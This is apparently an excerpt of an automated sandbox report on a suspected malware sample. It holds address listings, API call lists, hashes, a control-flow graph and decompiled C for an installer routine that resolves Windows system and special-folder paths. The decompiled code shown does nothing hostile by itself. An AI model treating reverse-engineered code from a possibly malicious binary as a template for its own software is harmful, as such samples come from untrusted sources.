                                                                                                                                                                            0x00404dd4
                                                                                                                                                                            0x00404de0
                                                                                                                                                                            0x00404def
                                                                                                                                                                            0x00404def
                                                                                                                                                                            0x00404df1
                                                                                                                                                                            0x00404df4
                                                                                                                                                                            0x00404dfd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404d04
                                                                                                                                                                            0x00404d0f
                                                                                                                                                                            0x00404d12
                                                                                                                                                                            0x00404d17
                                                                                                                                                                            0x00404d19
                                                                                                                                                                            0x00404d1d
                                                                                                                                                                            0x00404d2d
                                                                                                                                                                            0x00404d37
                                                                                                                                                                            0x00404d39
                                                                                                                                                                            0x00404d3c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404d1f
                                                                                                                                                                            0x00404d1f
                                                                                                                                                                            0x00404d25
                                                                                                                                                                            0x00404d27
                                                                                                                                                                            0x00404d27
                                                                                                                                                                            0x00404d28
                                                                                                                                                                            0x00404d29
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404d1f
                                                                                                                                                                            0x00404d02
                                                                                                                                                                            0x00404cdd
                                                                                                                                                                            0x00404c20
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404c36
                                                                                                                                                                            0x00404c40
                                                                                                                                                                            0x00404c45
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404c57
                                                                                                                                                                            0x00404c5c
                                                                                                                                                                            0x00404c68
                                                                                                                                                                            0x00404c68
                                                                                                                                                                            0x00404c6a
                                                                                                                                                                            0x00404c79
                                                                                                                                                                            0x00404c7b
                                                                                                                                                                            0x00404c7f
                                                                                                                                                                            0x00404c82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404c82
                                                                                                                                                                            0x00404c20
                                                                                                                                                                            0x004048e1
                                                                                                                                                                            0x004048e6
                                                                                                                                                                            0x004048ef
                                                                                                                                                                            0x004048f6
                                                                                                                                                                            0x00404904
                                                                                                                                                                            0x0040490f
                                                                                                                                                                            0x00404915
                                                                                                                                                                            0x00404923
                                                                                                                                                                            0x00404937
                                                                                                                                                                            0x0040493c
                                                                                                                                                                            0x00404949
                                                                                                                                                                            0x0040494e
                                                                                                                                                                            0x00404964
                                                                                                                                                                            0x00404975
                                                                                                                                                                            0x00404982
                                                                                                                                                                            0x00404982
                                                                                                                                                                            0x00404985
                                                                                                                                                                            0x0040498b
                                                                                                                                                                            0x0040498d
                                                                                                                                                                            0x00404990
                                                                                                                                                                            0x00404995
                                                                                                                                                                            0x0040499a
                                                                                                                                                                            0x0040499c
                                                                                                                                                                            0x0040499c
                                                                                                                                                                            0x004049b0
                                                                                                                                                                            0x004049bc
                                                                                                                                                                            0x004049bc
                                                                                                                                                                            0x004049be
                                                                                                                                                                            0x004049bf
                                                                                                                                                                            0x004049c4
                                                                                                                                                                            0x004049c7
                                                                                                                                                                            0x004049ca
                                                                                                                                                                            0x004049ce
                                                                                                                                                                            0x004049d3
                                                                                                                                                                            0x004049d8
                                                                                                                                                                            0x004049dc
                                                                                                                                                                            0x004049e1
                                                                                                                                                                            0x004049e6
                                                                                                                                                                            0x004049e8
                                                                                                                                                                            0x004049f0
                                                                                                                                                                            0x00404aba
                                                                                                                                                                            0x00404acd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004049f6
                                                                                                                                                                            0x004049f9
                                                                                                                                                                            0x004049fc
                                                                                                                                                                            0x004049ff
                                                                                                                                                                            0x004049ff
                                                                                                                                                                            0x00404a05
                                                                                                                                                                            0x00404a0b
                                                                                                                                                                            0x00404a0e
                                                                                                                                                                            0x00404a14
                                                                                                                                                                            0x00404a15
                                                                                                                                                                            0x00404a1a
                                                                                                                                                                            0x00404a23
                                                                                                                                                                            0x00404a2a
                                                                                                                                                                            0x00404a2d
                                                                                                                                                                            0x00404a30
                                                                                                                                                                            0x00404a33
                                                                                                                                                                            0x00404a6f
                                                                                                                                                                            0x00404a90
                                                                                                                                                                            0x00404a98
                                                                                                                                                                            0x00404a71
                                                                                                                                                                            0x00404a7e
                                                                                                                                                                            0x00404a7e
                                                                                                                                                                            0x00404a35
                                                                                                                                                                            0x00404a38
                                                                                                                                                                            0x00404a47
                                                                                                                                                                            0x00404a51
                                                                                                                                                                            0x00404a59
                                                                                                                                                                            0x00404a60
                                                                                                                                                                            0x00404a68
                                                                                                                                                                            0x00404a68
                                                                                                                                                                            0x00404a33
                                                                                                                                                                            0x00404a9e
                                                                                                                                                                            0x00404a9f
                                                                                                                                                                            0x00404aab
                                                                                                                                                                            0x00404aab
                                                                                                                                                                            0x00404ab8
                                                                                                                                                                            0x00404ad3
                                                                                                                                                                            0x00404ad7
                                                                                                                                                                            0x00404af4
                                                                                                                                                                            0x00404af9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ad9
                                                                                                                                                                            0x00404ade
                                                                                                                                                                            0x00404ae7
                                                                                                                                                                            0x00404e71
                                                                                                                                                                            0x00404e83
                                                                                                                                                                            0x00404e83
                                                                                                                                                                            0x00404ad7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ab8
                                                                                                                                                                            0x004049f0

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004048A7
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004048B2
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004048FC
                                                                                                                                                                            • LoadBitmapA.USER32(0000006E), ref: 0040490F
                                                                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00404E86), ref: 00404928
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040493C
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0040494E
                                                                                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404964
                                                                                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404970
                                                                                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404982
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404985
                                                                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B0
                                                                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049BC
                                                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A51
                                                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A7C
                                                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A90
                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404ABF
                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404ACD
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404ADE
                                                                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDB
                                                                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C40
                                                                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C55
                                                                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C79
                                                                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C99
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404CAE
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404CBE
                                                                                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D37
                                                                                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE0
                                                                                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DEF
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E0F
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E5D
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404E68
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404E6F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N$tp
                                                                                                                                                                            • API String ID: 1638840714-1013404652
                                                                                                                                                                            • Opcode ID: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
                                                                                                                                                                            • Instruction ID: e7c54df8ad39b376662a796d960b289492e5a6982c1727c2c37b81bede79f7f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
                                                                                                                                                                            • Instruction Fuzzy Hash: 43025EB0A00209AFEF109F54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 493 405d1b-405d26 494 405d28-405d37 493->494 495 405d39-405d4e 493->495 494->495 496 405f41-405f45 495->496 497 405d54-405d5f 495->497 499 405d71-405d7b 496->499 500 405f4b-405f55 496->500 497->496 498 405d65-405d6c 497->498 498->496 499->500 501 405d81-405d88 499->501 502 405f60-405f61 500->502 503 405f57-405f5b call 405cf9 500->503 504 405f34 501->504 505 405d8e-405dc3 501->505 503->502 507 405f36-405f3c 504->507 508 405f3e-405f40 504->508 509 405dc9-405dd4 GetVersion 505->509 510 405ede-405ee1 505->510 507->496 508->496 511 405dd6-405dda 509->511 512 405dee 509->512 513 405f11-405f14 510->513 514 405ee3-405ee6 510->514 511->512 517 405ddc-405de0 511->517 520 405df5-405dfc 512->520 515 405f22-405f32 lstrlenA 513->515 516 405f16-405f1d call 405d1b 513->516 518 405ef6-405f02 call 405cf9 514->518 519 405ee8-405ef4 call 405c57 514->519 515->496 516->515 517->512 522 405de2-405de6 517->522 531 405f07-405f0d 518->531 519->531 524 405e01-405e03 520->524 525 405dfe-405e00 520->525 522->512 527 405de8-405dec 522->527 529 405e05-405e20 call 405be0 524->529 530 405e3c-405e3f 524->530 525->524 527->520 539 405e25-405e28 529->539 532 405e41-405e4d GetSystemDirectoryA 530->532 533 405e4f-405e52 530->533 531->515 535 405f0f 531->535 536 405ec0-405ec3 532->536 537 405e54-405e62 GetWindowsDirectoryA 533->537 538 405ebc-405ebe 533->538 540 405ed6-405edc call 405f64 535->540 536->540 542 405ec5-405ec9 536->542 537->538 538->536 541 405e64-405e6e 538->541 539->542 543 405e2e-405e37 call 405d1b 539->543 540->515 548 405e70-405e73 541->548 549 405e88-405e9e SHGetSpecialFolderLocation 541->549 542->540 546 405ecb-405ed1 lstrcatA 542->546 543->536 546->540 548->549 551 405e75-405e7c 548->551 552 405ea0-405eb7 SHGetPathFromIDListA CoTaskMemFree 549->552 553 405eb9 549->553 554 405e84-405e86 551->554 552->536 552->553 553->538 554->536 554->549
                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                            			E00405D1B(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				struct _ITEMIDLIST* _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed char _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed char _v28;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				CHAR* _t38;
                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                            				int _t41;
                                                                                                                                                                            				char _t51;
                                                                                                                                                                            				char _t52;
                                                                                                                                                                            				char _t54;
                                                                                                                                                                            				char _t56;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                            				char _t82;
                                                                                                                                                                            				void* _t86;
                                                                                                                                                                            				CHAR* _t87;
                                                                                                                                                                            				void* _t89;
                                                                                                                                                                            				signed int _t96;
                                                                                                                                                                            				signed int _t98;
                                                                                                                                                                            				void* _t99;
                                                                                                                                                                            
                                                                                                                                                                            				_t89 = __esi;
                                                                                                                                                                            				_t86 = __edi;
                                                                                                                                                                            				_t64 = __ebx;
                                                                                                                                                                            				_t37 = _a8;
                                                                                                                                                                            				if(_t37 < 0) {
                                                                                                                                                                            					_t80 =  *0x422edc; // 0x70e974
                                                                                                                                                                            					_t37 =  *(_t80 - 4 + _t37 * 4);
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t64);
                                                                                                                                                                            				_t75 =  *0x423738 + _t37;
                                                                                                                                                                            				_t38 = 0x4226a0;
                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                            				_t87 = 0x4226a0;
                                                                                                                                                                            				if(_a4 >= 0x4226a0 && _a4 - 0x4226a0 < 0x800) {
                                                                                                                                                                            					_t87 = _a4;
                                                                                                                                                                            					_a4 = _a4 & 0x00000000;
                                                                                                                                                                            				}
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t82 =  *_t75;
                                                                                                                                                                            					if(_t82 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t87 - _t38 - 0x400;
                                                                                                                                                                            					if(_t87 - _t38 >= 0x400) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t75 = _t75 + 1;
                                                                                                                                                                            					__eflags = _t82 - 4;
                                                                                                                                                                            					_a8 = _t75;
                                                                                                                                                                            					if(__eflags >= 0) {
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							 *_t87 = _t82;
                                                                                                                                                                            							_t87 =  &(_t87[1]);
                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *_t87 =  *_t75;
                                                                                                                                                                            							_t87 =  &(_t87[1]);
                                                                                                                                                                            							_t75 = _t75 + 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t40 =  *(_t75 + 1);
                                                                                                                                                                            					_t76 =  *_t75;
                                                                                                                                                                            					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
                                                                                                                                                                            					_a8 = _a8 + 2;
                                                                                                                                                                            					_v28 = _t76 | 0x00000080;
                                                                                                                                                                            					_t70 = _t76;
                                                                                                                                                                            					_v24 = _t70;
                                                                                                                                                                            					__eflags = _t82 - 2;
                                                                                                                                                                            					_v20 = _t40 | 0x00000080;
                                                                                                                                                                            					_v16 = _t40;
                                                                                                                                                                            					if(_t82 != 2) {
                                                                                                                                                                            						__eflags = _t82 - 3;
                                                                                                                                                                            						if(_t82 != 3) {
                                                                                                                                                                            							__eflags = _t82 - 1;
                                                                                                                                                                            							if(_t82 == 1) {
                                                                                                                                                                            								__eflags = (_t40 | 0xffffffff) - _t96;
                                                                                                                                                                            								E00405D1B(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
                                                                                                                                                                            							}
                                                                                                                                                                            							L42:
                                                                                                                                                                            							_t41 = lstrlenA(_t87);
                                                                                                                                                                            							_t75 = _a8;
                                                                                                                                                                            							_t87 =  &(_t87[_t41]);
                                                                                                                                                                            							_t38 = 0x4226a0;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t96 - 0x1d;
                                                                                                                                                                            						if(_t96 != 0x1d) {
                                                                                                                                                                            							__eflags = (_t96 << 0xa) + 0x424000;
                                                                                                                                                                            							E00405CF9(_t87, (_t96 << 0xa) + 0x424000);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E00405C57(_t87,  *0x423708);
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t96 + 0xffffffeb - 7;
                                                                                                                                                                            						if(_t96 + 0xffffffeb < 7) {
                                                                                                                                                                            							L33:
                                                                                                                                                                            							E00405F64(_t87);
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L42;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t98 = 2;
                                                                                                                                                                            					_t51 = GetVersion();
                                                                                                                                                                            					__eflags = _t51;
                                                                                                                                                                            					if(_t51 >= 0) {
                                                                                                                                                                            						L13:
                                                                                                                                                                            						_v8 = 1;
                                                                                                                                                                            						L14:
                                                                                                                                                                            						__eflags =  *0x423784;
                                                                                                                                                                            						if( *0x423784 != 0) {
                                                                                                                                                                            							_t98 = 4;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t70;
                                                                                                                                                                            						if(_t70 >= 0) {
                                                                                                                                                                            							__eflags = _t70 - 0x25;
                                                                                                                                                                            							if(_t70 != 0x25) {
                                                                                                                                                                            								__eflags = _t70 - 0x24;
                                                                                                                                                                            								if(_t70 == 0x24) {
                                                                                                                                                                            									GetWindowsDirectoryA(_t87, 0x400);
                                                                                                                                                                            									_t98 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									__eflags = _t98;
                                                                                                                                                                            									if(_t98 == 0) {
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t52 =  *0x423704;
                                                                                                                                                                            									_t98 = _t98 - 1;
                                                                                                                                                                            									__eflags = _t52;
                                                                                                                                                                            									if(_t52 == 0) {
                                                                                                                                                                            										L26:
                                                                                                                                                                            										_t54 = SHGetSpecialFolderLocation( *0x423708,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
                                                                                                                                                                            										__eflags = _t54;
                                                                                                                                                                            										if(_t54 != 0) {
                                                                                                                                                                            											L28:
                                                                                                                                                                            											 *_t87 =  *_t87 & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t87;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            										__imp__SHGetPathFromIDListA(_v12, _t87);
                                                                                                                                                                            										__imp__CoTaskMemFree(_v12);
                                                                                                                                                                            										__eflags = _t54;
                                                                                                                                                                            										if(_t54 != 0) {
                                                                                                                                                                            											goto L30;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L28;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags = _v8;
                                                                                                                                                                            									if(_v8 == 0) {
                                                                                                                                                                            										goto L26;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t56 =  *_t52( *0x423708,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
                                                                                                                                                                            									__eflags = _t56;
                                                                                                                                                                            									if(_t56 == 0) {
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L26;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L30;
                                                                                                                                                                            							}
                                                                                                                                                                            							GetSystemDirectoryA(_t87, 0x400);
                                                                                                                                                                            							goto L30;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t73 = (_t70 & 0x0000003f) +  *0x423738;
                                                                                                                                                                            							E00405BE0(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x423738, _t87, _t70 & 0x00000040); // executed
                                                                                                                                                                            							__eflags =  *_t87;
                                                                                                                                                                            							if( *_t87 != 0) {
                                                                                                                                                                            								L31:
                                                                                                                                                                            								__eflags = _v16 - 0x1a;
                                                                                                                                                                            								if(_v16 == 0x1a) {
                                                                                                                                                                            									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							E00405D1B(_t73, _t87, _t98, _t87, _v16);
                                                                                                                                                                            							L30:
                                                                                                                                                                            							__eflags =  *_t87;
                                                                                                                                                                            							if( *_t87 == 0) {
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L31;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t51 - 0x5a04;
                                                                                                                                                                            					if(_t51 == 0x5a04) {
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _v16 - 0x23;
                                                                                                                                                                            					if(_v16 == 0x23) {
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _v16 - 0x2e;
                                                                                                                                                                            					if(_v16 == 0x2e) {
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_v8 = _v8 & 0x00000000;
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *_t87 =  *_t87 & 0x00000000;
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					return _t38;
                                                                                                                                                                            				}
                                                                                                                                                                            				return E00405CF9(_a4, _t38);
                                                                                                                                                                            			}





























                                                                                                                                                                            0x00405d1b
                                                                                                                                                                            0x00405d1b
                                                                                                                                                                            0x00405d1b
                                                                                                                                                                            0x00405d21
                                                                                                                                                                            0x00405d26
                                                                                                                                                                            0x00405d28
                                                                                                                                                                            0x00405d37
                                                                                                                                                                            0x00405d37
                                                                                                                                                                            0x00405d3f
                                                                                                                                                                            0x00405d40
                                                                                                                                                                            0x00405d42
                                                                                                                                                                            0x00405d4a
                                                                                                                                                                            0x00405d4b
                                                                                                                                                                            0x00405d4c
                                                                                                                                                                            0x00405d4e
                                                                                                                                                                            0x00405d65
                                                                                                                                                                            0x00405d68
                                                                                                                                                                            0x00405d68
                                                                                                                                                                            0x00405f41
                                                                                                                                                                            0x00405f41
                                                                                                                                                                            0x00405f45
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405d75
                                                                                                                                                                            0x00405d7b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405d81
                                                                                                                                                                            0x00405d82
                                                                                                                                                                            0x00405d85
                                                                                                                                                                            0x00405d88
                                                                                                                                                                            0x00405f34
                                                                                                                                                                            0x00405f3e
                                                                                                                                                                            0x00405f40
                                                                                                                                                                            0x00405f40
                                                                                                                                                                            0x00405f36
                                                                                                                                                                            0x00405f38
                                                                                                                                                                            0x00405f3a
                                                                                                                                                                            0x00405f3b
                                                                                                                                                                            0x00405f3b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405f34
                                                                                                                                                                            0x00405d8e
                                                                                                                                                                            0x00405d92
                                                                                                                                                                            0x00405da2
                                                                                                                                                                            0x00405da6
                                                                                                                                                                            0x00405dad
                                                                                                                                                                            0x00405db0
                                                                                                                                                                            0x00405db4
                                                                                                                                                                            0x00405dba
                                                                                                                                                                            0x00405dbd
                                                                                                                                                                            0x00405dc0
                                                                                                                                                                            0x00405dc3
                                                                                                                                                                            0x00405ede
                                                                                                                                                                            0x00405ee1
                                                                                                                                                                            0x00405f11
                                                                                                                                                                            0x00405f14
                                                                                                                                                                            0x00405f19
                                                                                                                                                                            0x00405f1d
                                                                                                                                                                            0x00405f1d
                                                                                                                                                                            0x00405f22
                                                                                                                                                                            0x00405f23
                                                                                                                                                                            0x00405f28
                                                                                                                                                                            0x00405f2b
                                                                                                                                                                            0x00405f2d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405f2d
                                                                                                                                                                            0x00405ee3
                                                                                                                                                                            0x00405ee6
                                                                                                                                                                            0x00405efb
                                                                                                                                                                            0x00405f02
                                                                                                                                                                            0x00405ee8
                                                                                                                                                                            0x00405eef
                                                                                                                                                                            0x00405eef
                                                                                                                                                                            0x00405f0a
                                                                                                                                                                            0x00405f0d
                                                                                                                                                                            0x00405ed6
                                                                                                                                                                            0x00405ed7
                                                                                                                                                                            0x00405ed7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405f0d
                                                                                                                                                                            0x00405dcb
                                                                                                                                                                            0x00405dcc
                                                                                                                                                                            0x00405dd2
                                                                                                                                                                            0x00405dd4
                                                                                                                                                                            0x00405dee
                                                                                                                                                                            0x00405dee
                                                                                                                                                                            0x00405df5
                                                                                                                                                                            0x00405df5
                                                                                                                                                                            0x00405dfc
                                                                                                                                                                            0x00405e00
                                                                                                                                                                            0x00405e00
                                                                                                                                                                            0x00405e01
                                                                                                                                                                            0x00405e03
                                                                                                                                                                            0x00405e3c
                                                                                                                                                                            0x00405e3f
                                                                                                                                                                            0x00405e4f
                                                                                                                                                                            0x00405e52
                                                                                                                                                                            0x00405e5a
                                                                                                                                                                            0x00405e60
                                                                                                                                                                            0x00405e60
                                                                                                                                                                            0x00405ebc
                                                                                                                                                                            0x00405ebc
                                                                                                                                                                            0x00405ebe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405e64
                                                                                                                                                                            0x00405e6b
                                                                                                                                                                            0x00405e6c
                                                                                                                                                                            0x00405e6e
                                                                                                                                                                            0x00405e88
                                                                                                                                                                            0x00405e96
                                                                                                                                                                            0x00405e9c
                                                                                                                                                                            0x00405e9e
                                                                                                                                                                            0x00405eb9
                                                                                                                                                                            0x00405eb9
                                                                                                                                                                            0x00405eb9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405eb9
                                                                                                                                                                            0x00405ea4
                                                                                                                                                                            0x00405eaf
                                                                                                                                                                            0x00405eb5
                                                                                                                                                                            0x00405eb7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405eb7
                                                                                                                                                                            0x00405e70
                                                                                                                                                                            0x00405e73
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405e82
                                                                                                                                                                            0x00405e84
                                                                                                                                                                            0x00405e86
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405e86
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ebc
                                                                                                                                                                            0x00405e47
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405e05
                                                                                                                                                                            0x00405e0a
                                                                                                                                                                            0x00405e20
                                                                                                                                                                            0x00405e25
                                                                                                                                                                            0x00405e28
                                                                                                                                                                            0x00405ec5
                                                                                                                                                                            0x00405ec5
                                                                                                                                                                            0x00405ec9
                                                                                                                                                                            0x00405ed1
                                                                                                                                                                            0x00405ed1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ec9
                                                                                                                                                                            0x00405e32
                                                                                                                                                                            0x00405ec0
                                                                                                                                                                            0x00405ec0
                                                                                                                                                                            0x00405ec3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ec3
                                                                                                                                                                            0x00405e03
                                                                                                                                                                            0x00405dd6
                                                                                                                                                                            0x00405dda
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ddc
                                                                                                                                                                            0x00405de0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405de2
                                                                                                                                                                            0x00405de6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405de8
                                                                                                                                                                            0x00405de8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405de8
                                                                                                                                                                            0x00405de6
                                                                                                                                                                            0x00405f4b
                                                                                                                                                                            0x00405f55
                                                                                                                                                                            0x00405f61
                                                                                                                                                                            0x00405f61
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetVersion.KERNEL32(?,0041F4E8,00000000,00404F4A,0041F4E8,00000000), ref: 00405DCC
                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E47
                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
